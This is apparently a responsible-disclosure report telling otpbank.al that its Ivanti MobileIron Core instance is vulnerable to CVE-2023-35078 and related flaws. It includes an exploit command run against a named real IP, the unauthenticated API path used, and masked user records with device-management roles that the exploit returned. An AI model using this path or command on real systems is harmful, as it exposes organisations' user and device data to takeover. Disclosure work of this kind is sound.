
otpbank.al / Ivanti MobileIron core is outdated

Chocapikk reported 2023-08-05

The following Ivanti MobileIron instance is publicly accessible and appears to be outdated:

It is critical to update to a safe version as soon as possible, since these vulnerabilities could lead to takeover of the instance and its managed devices. They are currently being used in ransomware campaigns and could damage your network.

Reference:

Proof Of Concept:

$ python3.10 exploit.py --verbose -u https://80.78.65.45:443                                      9:14:39 
Fetching data from: https://80.78.65.45:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
The response is not a valid JSON. The site is not vulnerable.
Fetching data from: https://80.78.65.45:443/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
https://80.78.65.45:443 may be vulnerable to CVE-2023-35078
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_REG, 
ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW

IP: 80.78.65.45
Port: 443
Detected protocol: https
Vulnerable URL: https://80.78.65.45
Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
Affected by CVE-2023-35078
Affected by CVE-2023-35081

WARNING: This event relies on the version reported by the software and might not account for manual patching of older versions. Please discard if manual RPM patch has been applied.
Found by MobileIronCorePlugin 2023-08-03
Report created by Chocapikk  2023-08-05
Report approved by BloodyShell  2023-08-05
New PDF report generated by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by BloodyShell  2023-08-13
Report closed by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by Chocapikk  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by BloodyShell  2024-03-14
New PDF report generated by system 2024-03-14
Report edited by BloodyShell  2024-03-14
New PDF report generated by system 2024-03-14
Information
Owner otpbank.al
Created 2023-08-05 19:15
Updated 2024-03-14 10:00
Fixed true

Contacts
A...@otpbank.al
i...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al

Status
Status closed
Hosting contacted false
CERT contacted false
